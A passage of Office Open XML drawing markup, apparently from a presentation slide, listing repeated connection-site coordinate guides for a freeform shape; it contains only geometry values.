              <a:gd name="connsiteX46" fmla="*/ 484062 w 1409331"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 441342 w 1409331"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 375594 w 1409331"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 346411 w 1409331"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 350481 w 1409331"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 318312 w 1409331"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308199 w 1409331"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 292416 w 1409331"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 289874 w 1409331"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 290867 w 1409331"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 263851 w 1409331"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 240408 w 1409331"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 194207 w 1409331"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 165644 w 1409331"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 146439 w 1409331"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 152261 w 1409331"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 146653 w 1409331"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 152526 w 1409331"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 134114 w 1409331"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 122850 w 1409331"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 124306 w 1409331"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 119171 w 1409331"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79309 w 1409331"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 76219 w 1409331"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 69875 w 1409331"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 67171 w 1409331"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 71079 w 1409331"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 367 w 1409331"/>
              <a:gd name="connsiteY73" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 110711 w 1409331"/>
              <a:gd name="connsiteY74" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 100996 w 1409331"/>
              <a:gd name="connsiteY75" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 82549 w 1409331"/>
              <a:gd name="connsiteY76" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 82549 w 1409331"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1409331 w 1409331"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1409331 w 1409331"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 146025 w 1409331"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 182618 w 1409331"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 194118 w 1409331"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 211525 w 1409331"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 223103 w 1409331"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 295946 w 1409331"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 311633 w 1409331"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 330473 w 1409331"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 318247 w 1409331"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 310905 w 1409331"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 309703 w 1409331"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 317288 w 1409331"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 347246 w 1409331"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 377044 w 1409331"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 391056 w 1409331"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 415487 w 1409331"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 452370 w 1409331"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 490751 w 1409331"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 496910 w 1409331"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 505192 w 1409331"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 508802 w 1409331"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 522668 w 1409331"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 525399 w 1409331"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 523657 w 1409331"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 530566 w 1409331"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 541825 w 1409331"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 547728 w 1409331"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 547041 w 1409331"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 538689 w 1409331"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 519342 w 1409331"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 520971 w 1409331"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 508671 w 1409331"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 508396 w 1409331"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 512695 w 1409331"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 523068 w 1409331"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 533964 w 1409331"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 541310 w 1409331"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 540606 w 1409331"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 544049 w 1409331"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 565479 w 1409331"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 548005 w 1409331"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 523413 w 1409331"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 508888 w 1409331"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 484062 w 1409331"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 441342 w 1409331"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 375594 w 1409331"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 346411 w 1409331"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 350481 w 1409331"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 318312 w 1409331"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 308199 w 1409331"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 292416 w 1409331"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 289874 w 1409331"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 290867 w 1409331"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 263851 w 1409331"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 240408 w 1409331"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 194207 w 1409331"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 165644 w 1409331"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 146439 w 1409331"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 152261 w 1409331"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 146653 w 1409331"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 152526 w 1409331"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 134114 w 1409331"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 122850 w 1409331"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 124306 w 1409331"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 119171 w 1409331"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79309 w 1409331"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 76219 w 1409331"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 69875 w 1409331"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 67171 w 1409331"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 71079 w 1409331"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 367 w 1409331"/>
              <a:gd name="connsiteY73" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 100996 w 1409331"/>
              <a:gd name="connsiteY74" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 82549 w 1409331"/>
              <a:gd name="connsiteY75" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 102722 w 1429504"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1429504 w 1429504"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1429504 w 1429504"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 166198 w 1429504"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 202791 w 1429504"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 214291 w 1429504"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 231698 w 1429504"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 243276 w 1429504"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 316119 w 1429504"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 331806 w 1429504"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 350646 w 1429504"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 338420 w 1429504"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 331078 w 1429504"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 329876 w 1429504"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 337461 w 1429504"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 367419 w 1429504"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 397217 w 1429504"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 411229 w 1429504"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 435660 w 1429504"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 472543 w 1429504"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 510924 w 1429504"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 517083 w 1429504"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 525365 w 1429504"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 528975 w 1429504"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 542841 w 1429504"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 545572 w 1429504"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 543830 w 1429504"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 550739 w 1429504"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 561998 w 1429504"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 567901 w 1429504"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 567214 w 1429504"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 558862 w 1429504"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 539515 w 1429504"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 541144 w 1429504"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 528844 w 1429504"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 528569 w 1429504"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 532868 w 1429504"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 543241 w 1429504"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 554137 w 1429504"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 561483 w 1429504"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 560779 w 1429504"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 564222 w 1429504"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 585652 w 1429504"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 568178 w 1429504"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 543586 w 1429504"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 529061 w 1429504"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 504235 w 1429504"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 461515 w 1429504"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 395767 w 1429504"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 366584 w 1429504"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 370654 w 1429504"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 338485 w 1429504"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 328372 w 1429504"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 312589 w 1429504"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 310047 w 1429504"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 311040 w 1429504"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 284024 w 1429504"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 260581 w 1429504"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 214380 w 1429504"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 185817 w 1429504"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 166612 w 1429504"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 172434 w 1429504"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 166826 w 1429504"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 172699 w 1429504"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 154287 w 1429504"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 143023 w 1429504"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 144479 w 1429504"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 139344 w 1429504"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 99482 w 1429504"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 96392 w 1429504"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 90048 w 1429504"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 87344 w 1429504"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 91252 w 1429504"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 20540 w 1429504"/>
              <a:gd name="connsiteY73" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 3122 w 1429504"/>
              <a:gd name="connsiteY74" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 102722 w 1429504"/>
              <a:gd name="connsiteY75" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 109280 w 1436062"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1436062 w 1436062"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1436062 w 1436062"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 172756 w 1436062"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 209349 w 1436062"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 220849 w 1436062"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 238256 w 1436062"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 249834 w 1436062"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 322677 w 1436062"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 338364 w 1436062"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 357204 w 1436062"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 344978 w 1436062"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 337636 w 1436062"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 336434 w 1436062"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 344019 w 1436062"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 373977 w 1436062"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 403775 w 1436062"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 417787 w 1436062"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 442218 w 1436062"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 479101 w 1436062"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 517482 w 1436062"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 523641 w 1436062"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 531923 w 1436062"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 535533 w 1436062"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 549399 w 1436062"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 552130 w 1436062"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 550388 w 1436062"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 557297 w 1436062"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 568556 w 1436062"/>
